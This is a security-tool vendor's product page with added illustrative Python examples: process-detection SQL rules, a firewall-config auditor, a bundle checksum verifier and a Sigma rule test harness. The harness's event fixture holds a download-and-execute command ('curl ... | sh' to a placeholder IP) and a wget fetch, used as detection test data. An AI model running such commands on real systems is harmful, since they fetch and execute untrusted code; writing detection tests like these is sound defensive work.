Operator-focused Security Tooling

EvilBit Labs

We build operator-focused security tools that work offline, on purpose. Welcome to EvilBit Labs.

Trusted for Enterprise & Open Source

Operator-Centric
Built for real-world needs by practitioners
Airgap-Friendly
Designed for offline, high-security environments
Transparent by Design
Open code, real docs, and behavior you can trust
Tested Under Pressure
Robust engineering that holds up when it matters most
Your Stack, Your Choice
Works with your existing tools, OS, and infrastructure

Products & Tools

Our Solutions

DaemonEye

Open Source

High-performance security process monitoring system with audit-grade integrity. Detect process anomalies, hollowing attacks, and suspicious behavior across your infrastructure.

  • Real-time process monitoring with <5% system overhead
  • Cross-platform security monitoring for Linux, macOS, and Windows
  • SQL-based custom detection rules with flexible anomaly detection
Learn more about DaemonEye
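To show what "SQL-based custom detection rules" over a process snapshot can look like in practice, here is an added example that is not DaemonEye's code: it loads a constructed process list into an in-memory SQLite table and runs three plain-SQL rules against it. The table layout (`pid, ppid, name, exe_path, cmdline`), the rule names and the sample processes are all assumptions for this illustration; DaemonEye's real schema and rule format are documented by the project itself.

```python
"""Added example (not DaemonEye code): SQL detection rules over a process snapshot.

The table layout, the rules and the sample processes are constructed for this
illustration and do not describe DaemonEye's actual schema or rule format.
"""
import sqlite3

# Constructed snapshot: (pid, ppid, name, exe_path, cmdline)
SAMPLE_PROCESSES = [
    (1, 0, "systemd", "/usr/lib/systemd/systemd", "/sbin/init"),
    (412, 1, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D"),
    (900, 412, "bash", "/usr/bin/bash", "-bash"),
    # Calls itself "sshd" but the image on disk lives under /tmp: masquerading.
    (1337, 900, "sshd", "/tmp/.x/sshd", "/tmp/.x/sshd -D"),
    # A shell spawned by a web server worker: suspicious parent/child pair.
    (2001, 1, "nginx", "/usr/sbin/nginx", "nginx: worker process"),
    (2002, 2001, "sh", "/usr/bin/sh", "sh -c id"),
    # Process name does not match the executable it is actually running.
    (3000, 1, "cron", "/usr/bin/python3", "cron"),
]

# Each rule is ordinary SQL against the snapshot table and returns offending pids.
RULES = {
    "masquerading_system_binary": """
        SELECT p.pid FROM processes p
        WHERE p.name IN ('sshd', 'systemd', 'cron')
          AND p.exe_path NOT LIKE '/usr/%'
          AND p.exe_path NOT LIKE '/sbin/%'
    """,
    "shell_spawned_by_web_server": """
        SELECT c.pid FROM processes c
        JOIN processes par ON par.pid = c.ppid
        WHERE par.name IN ('nginx', 'apache2', 'httpd')
          AND c.name IN ('sh', 'bash', 'dash')
    """,
    # Cheap hollowing/injection indicator: the name should be the basename of exe_path.
    # (A real check compares the mapped image against the file on disk.)
    "name_does_not_match_image": """
        SELECT p.pid FROM processes p
        WHERE p.exe_path NOT LIKE '%/' || p.name
    """,
}


def build_snapshot(rows):
    """Load a list of process tuples into an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE processes (pid INTEGER PRIMARY KEY, ppid INTEGER, "
        "name TEXT, exe_path TEXT, cmdline TEXT)"
    )
    conn.executemany("INSERT INTO processes VALUES (?, ?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def run_rules(conn, rules):
    """Return {rule_name: sorted matching pids}; rules with no hits are omitted."""
    hits = {}
    for name, sql in rules.items():
        pids = sorted(row[0] for row in conn.execute(sql))
        if pids:
            hits[name] = pids
    return hits


def detect(rows=SAMPLE_PROCESSES, rules=RULES):
    """Run every rule over a snapshot and return the findings."""
    conn = build_snapshot(rows)
    try:
        return run_rules(conn, rules)
    finally:
        conn.close()


if __name__ == "__main__":
    for rule, pids in detect().items():
        print(f"{rule}: pids {pids}")
```

Keeping rules as SQL means an operator can test a new rule against a saved snapshot before deploying it, and a rule that matches nothing simply contributes no findings.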

dbsurveyor

Open Source

Fast, offline database schema discovery and sampling. Understand unfamiliar databases quickly with portable reports.

  • Schema + sample extraction with throttle control
  • Portable outputs with optional compression and AES-GCM encryption
  • Markdown/JSON reports and SQL reconstruction
Learn more about dbsurveyor

Gold Digger

Open Source

Rust CLI for MySQL/MariaDB query execution and structured data export. Designed for operators who need reliable, reproducible data extraction.

  • MySQL/MariaDB support with secure TLS connections
  • Structured outputs: CSV, JSON, TSV with deterministic formatting
  • Built for automation (cron, CI/CD) and offline-first environments
Learn more about Gold Digger

opnDossier

Open Source

Readable reports from OPNsense configs. Turns OPNsense config.xml files into clear, operator-ready documentation with optional audit reporting.

  • Convert: structured Markdown/JSON/YAML (summary or comprehensive)
  • Display: themed terminal rendering with syntax highlighting
  • Audit: standard/blue/red reports with findings and recommendations
Learn more about opnDossier
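The convert-and-audit idea above, as an added example that is not opnDossier's code: it parses a constructed, minimal OPNsense-style config.xml (a `filter/rule` section with `type`, `interface`, `source`, `destination` and `descr` elements), renders the rules as a Markdown table, and attaches one finding class, pass rules on a WAN interface that accept traffic from any source. The sample config, the finding logic and the report layout are assumptions for this illustration; real config.xml files carry many more elements than shown here.

```python
"""Added example (not opnDossier code): OPNsense-style config.xml to Markdown with findings.

The config below is constructed and only uses the handful of elements this
parser reads; the finding rule and report layout are illustrative choices.
"""
import xml.etree.ElementTree as ET

SAMPLE_CONFIG = """<?xml version="1.0"?>
<opnsense>
  <filter>
    <rule>
      <type>pass</type>
      <interface>wan</interface>
      <ipprotocol>inet</ipprotocol>
      <protocol>tcp</protocol>
      <source><any>1</any></source>
      <destination><network>lan</network><port>22</port></destination>
      <descr>Allow SSH from anywhere</descr>
    </rule>
    <rule>
      <type>pass</type>
      <interface>lan</interface>
      <ipprotocol>inet</ipprotocol>
      <source><network>lan</network></source>
      <destination><any>1</any></destination>
      <descr>Default allow LAN to any rule</descr>
    </rule>
    <rule>
      <type>block</type>
      <interface>wan</interface>
      <ipprotocol>inet</ipprotocol>
      <source><any>1</any></source>
      <destination><any>1</any></destination>
      <descr>Catch-all block</descr>
    </rule>
  </filter>
</opnsense>
"""


def _endpoint(node):
    """Render a <source> or <destination> element as 'addr' or 'addr:port'."""
    if node is None:
        return "?"
    if node.find("any") is not None:
        addr = "any"
    else:
        addr = node.findtext("network") or node.findtext("address") or "?"
    port = node.findtext("port")
    return f"{addr}:{port}" if port else addr


def parse_rules(xml_text):
    """Extract the firewall rules as a list of flat dicts."""
    root = ET.fromstring(xml_text)
    rules = []
    for r in root.findall("./filter/rule"):
        rules.append({
            "type": r.findtext("type", "?"),
            "interface": r.findtext("interface", "?"),
            "protocol": r.findtext("protocol", "any"),
            "source": _endpoint(r.find("source")),
            "destination": _endpoint(r.find("destination")),
            "descr": r.findtext("descr", ""),
        })
    return rules


def audit(rules):
    """One illustrative finding: pass rules on wan that admit any source."""
    findings = []
    for i, r in enumerate(rules, 1):
        if r["type"] == "pass" and r["interface"] == "wan" and r["source"].startswith("any"):
            findings.append(
                f"Rule {i} ({r['descr']!r}) passes traffic from any source on wan "
                f"to {r['destination']}; restrict the source or move access behind a VPN"
            )
    return findings


def to_markdown(rules, findings):
    """Render the rule table and, if any, a Findings section."""
    lines = [
        "| # | Action | Iface | Proto | Source | Destination | Description |",
        "|---|--------|-------|-------|--------|-------------|-------------|",
    ]
    for i, r in enumerate(rules, 1):
        lines.append(
            f"| {i} | {r['type']} | {r['interface']} | {r['protocol']} | "
            f"{r['source']} | {r['destination']} | {r['descr']} |"
        )
    if findings:
        lines += ["", "## Findings"] + [f"- {f}" for f in findings]
    return "\n".join(lines)


def report(xml_text=SAMPLE_CONFIG):
    """Return (rules, findings, markdown) for a config.xml string."""
    rules = parse_rules(xml_text)
    findings = audit(rules)
    return rules, findings, to_markdown(rules, findings)


if __name__ == "__main__":
    print(report()[2])
```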

Airgap Package Fetcher

Open Source

Offline bundles for pip, apt, Docker, and Homebrew. Fetch and ship complete dependency trees for airgapped installs.

  • Offline-first: bundles install with zero network access
  • Multi-ecosystem: pip, apt, Docker images, Homebrew
  • Integrity: SHA256/SHA512 checksums, optional signatures
Learn more about Airgap Package Fetcher
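The integrity step, as an added example that is not the Airgap Package Fetcher's code: before anything in an offline bundle is installed, every file is checked against a checksum manifest, and the check distinguishes a clean file from a tampered one, a file the manifest lists but the bundle lacks, and a file that turned up in the bundle without being listed. The manifest format assumed here is the `<hex>  <filename>` form that `sha256sum -c` and `sha512sum -c` read; the bundle contents and file names are constructed for the demo.

```python
"""Added example (not Airgap Package Fetcher code): verify a bundle against a checksum manifest.

Assumes the GNU coreutils manifest layout ("<hex>  <name>", one file per line).
The bundle built in demo() is constructed for illustration.
"""
import hashlib
import os
import tempfile

ALGOS = {"sha256": (hashlib.sha256, 64), "sha512": (hashlib.sha512, 128)}


def file_digest(path, algo):
    """Stream a file through the chosen hash; large bundle files should not be read whole."""
    h = ALGOS[algo][0]()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Return [(digest, name)], rejecting lines that are not '<hex>  <name>'."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        try:
            int(digest, 16)
        except ValueError:
            raise ValueError(f"malformed manifest line: {line!r}") from None
        if not name or len(digest) not in (64, 128):
            raise ValueError(f"malformed manifest line: {line!r}")
        entries.append((digest.lower(), name.lstrip("*")))  # '*' marks binary mode
    return entries


def verify_bundle(bundle_dir, manifest_text, algo, ignore=("SHA256SUMS", "SHA512SUMS")):
    """Classify every file as ok / mismatch / missing / unlisted for the given algorithm."""
    expected_len = ALGOS[algo][1]
    result = {"ok": [], "mismatch": [], "missing": [], "unlisted": []}
    listed = set()
    for digest, name in parse_manifest(manifest_text):
        if len(digest) != expected_len:
            raise ValueError(f"{name}: digest length does not match {algo}")
        listed.add(name)
        path = os.path.join(bundle_dir, name)
        if not os.path.isfile(path):
            result["missing"].append(name)
        elif file_digest(path, algo) == digest:
            result["ok"].append(name)
        else:
            result["mismatch"].append(name)
    # Files the manifest never mentions must not be installed silently either.
    for name in sorted(os.listdir(bundle_dir)):
        if name not in listed and name not in ignore:
            result["unlisted"].append(name)
    return result


def demo(algo="sha256"):
    """Constructed bundle: one clean file, one tampered, one missing, one unlisted."""
    files = {
        "alpha-1.0.0-py3-none-any.whl": b"alpha wheel bytes",
        "beta-2.0.0-py3-none-any.whl": b"beta wheel bytes",
    }
    with tempfile.TemporaryDirectory() as d:
        for name, data in files.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        manifest = "\n".join(
            f"{hashlib.sha256(data).hexdigest()}  {name}" for name, data in files.items()
        ) + f"\n{'0' * 64}  gamma-3.0.0-py3-none-any.whl\n"
        # Tamper with beta after the manifest was produced, and drop in a stray file.
        with open(os.path.join(d, "beta-2.0.0-py3-none-any.whl"), "ab") as f:
            f.write(b"!")
        with open(os.path.join(d, "stray.deb"), "wb") as f:
            f.write(b"not in manifest")
        return verify_bundle(d, manifest, algo)


if __name__ == "__main__":
    for status, names in demo().items():
        print(f"{status}: {names}")
```

Treat any non-empty `mismatch`, `missing` or `unlisted` list as a hard stop for the install; a checksum manifest only proves integrity, so the manifest itself still needs a signature (the page's "optional signatures") to prove who produced it.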

Custom R&D

Enterprise

Tailored cybersecurity research and development for unique organizational challenges.

  • Custom solutions
  • Expert consultation
  • Proof of concept
Learn more about Custom R&D

Detection Toolkit

Enterprise

Offline detection rule testing that actually runs in labs. Validate Sigma and more with deterministic test workflows.

  • Declarative test definitions (YAML/JSON) executed by an orchestrator
  • Sigma + JSONL MVP with pass/fail assertions and checksums
  • Structured outputs (JSON/Markdown/JUnit) for audits and CI
Open Source
Learn more about Detection Toolkit
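To make the declarative-test idea concrete, here is an added example that is not the Detection Toolkit's code: a Sigma-style rule, a JSONL event fixture and a JSON test definition (Sigma rules are YAML, and JSON is a subset of YAML, so no extra parser is needed) are fed to a small orchestrator that checks the fixture's SHA-256 against the value recorded in the test, evaluates the rule over every event, compares the matched event ids with the expected list, and returns a pass/fail record. The rule, events and test are constructed, and the evaluator deliberately supports only the Sigma subset it documents (field maps with `contains`/`startswith`/`endswith` modifiers and conditions of the form `a and not b`).

```python
"""Added example (not Detection Toolkit code): run a declarative test of a Sigma-style rule
over JSONL events, with a fixture checksum and pass/fail assertions.

Only a small Sigma subset is implemented: selection maps with exact / contains /
startswith / endswith modifiers, list values meaning OR, and conditions made of
identifiers joined by ' and ', optionally prefixed with 'not '.
"""
import hashlib
import json

# Constructed Sigma-style rule.
RULE_JSON = json.dumps({
    "title": "Shell download cradle",
    "logsource": {"category": "process_creation", "product": "linux"},
    "detection": {
        "selection": {"Image|endswith": ["/curl", "/wget"], "CommandLine|contains": "http"},
        "filter": {"CommandLine|contains": "internal.example"},
        "condition": "selection and not filter",
    },
})

# Constructed JSONL events, one JSON object per line.
EVENTS_JSONL = "\n".join(json.dumps(e) for e in [
    {"id": "e1", "Image": "/usr/bin/ls", "CommandLine": "ls -la"},
    {"id": "e2", "Image": "/usr/bin/curl", "CommandLine": "curl http://203.0.113.9/x.sh | sh"},
    {"id": "e3", "Image": "/usr/bin/curl", "CommandLine": "curl https://internal.example/health"},
    {"id": "e4", "Image": "/usr/bin/wget", "CommandLine": "wget http://198.51.100.7/a"},
    {"id": "e5", "Image": "/usr/bin/curl", "CommandLine": "curl --version"},
])

# Constructed declarative test: expected matches plus the checksum of the fixture.
TEST_JSON = json.dumps({
    "name": "download cradle matches external URLs only",
    "expect": {"matched_ids": ["e2", "e4"]},
    "events_sha256": hashlib.sha256(EVENTS_JSONL.encode()).hexdigest(),
})


def _field_matches(event, key, wanted):
    """Match one 'Field|modifier' key; a list of wanted values is an OR."""
    field, _, modifier = key.partition("|")
    value = event.get(field)
    if value is None:
        return False
    value = str(value)
    for w in map(str, wanted if isinstance(wanted, list) else [wanted]):
        if (modifier == "" and value == w) or (modifier == "contains" and w in value) \
                or (modifier == "startswith" and value.startswith(w)) \
                or (modifier == "endswith" and value.endswith(w)):
            return True
    return False


def _search_matches(event, search):
    """Every field in a search identifier must hold (Sigma map semantics)."""
    return all(_field_matches(event, k, v) for k, v in search.items())


def rule_matches(rule, event):
    """Evaluate a condition of the form 'a and b and not c'."""
    det = rule["detection"]
    for term in det["condition"].split(" and "):
        negate = term.startswith("not ")
        name = term[4:] if negate else term
        if _search_matches(event, det[name]) == negate:
            return False
    return True


def run_test(test_json=TEST_JSON, rule_json=RULE_JSON, events_jsonl=EVENTS_JSONL):
    """Orchestrate one test: checksum the fixture, run the rule, compare with expectations."""
    test, rule = json.loads(test_json), json.loads(rule_json)
    failures = []
    actual_sha = hashlib.sha256(events_jsonl.encode()).hexdigest()
    if actual_sha != test["events_sha256"]:
        failures.append("events fixture checksum mismatch; fixture changed since test was written")
    events = [json.loads(line) for line in events_jsonl.splitlines() if line.strip()]
    matched = [e["id"] for e in events if rule_matches(rule, e)]
    if matched != test["expect"]["matched_ids"]:
        failures.append(f"expected {test['expect']['matched_ids']}, got {matched}")
    return {
        "name": test["name"],
        "status": "pass" if not failures else "fail",
        "matched_ids": matched,
        "events_sha256": actual_sha,
        "failures": failures,
    }


if __name__ == "__main__":
    print(json.dumps(run_test(), indent=2))
```

The returned record is plain JSON, which is the shape a CI job or an audit trail wants; the checksum is what makes a lab result reproducible, since a rule that "passes" against a silently edited fixture proves nothing.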

NetflowWatcher

Enterprise

Local-first network flow anomaly detection with analyst feedback.

  • Ingest SiLK/nfdump-style flows and normalize
  • Online anomaly scoring blended with supervised feedback
  • Review/label/export flows in a web UI; Docker Compose deployment
Learn more about NetflowWatcher